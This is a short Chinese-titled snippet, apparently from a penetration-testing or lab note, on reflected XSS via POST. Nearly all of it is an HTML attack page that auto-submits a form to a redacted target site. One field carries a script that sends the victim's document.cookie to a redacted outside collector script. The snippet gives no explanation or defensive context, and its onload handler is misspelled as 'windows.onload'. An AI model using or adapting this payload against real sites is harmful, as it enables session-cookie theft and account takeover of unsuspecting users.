反射型XSS（POST方式）

反射型XSS（POST方式）

<html>
<head>
<script>
windows.onload = function(){
    document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="https://**.com/**.htm">
    <input id= "xssr_in" type="text"  name="message" value=
    "<script>
document.location = 'http://****/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
    </script>"
    />
    <input id="postsubmit" type="submit" name="submit" value="submit" />

</form>
</body>
</html>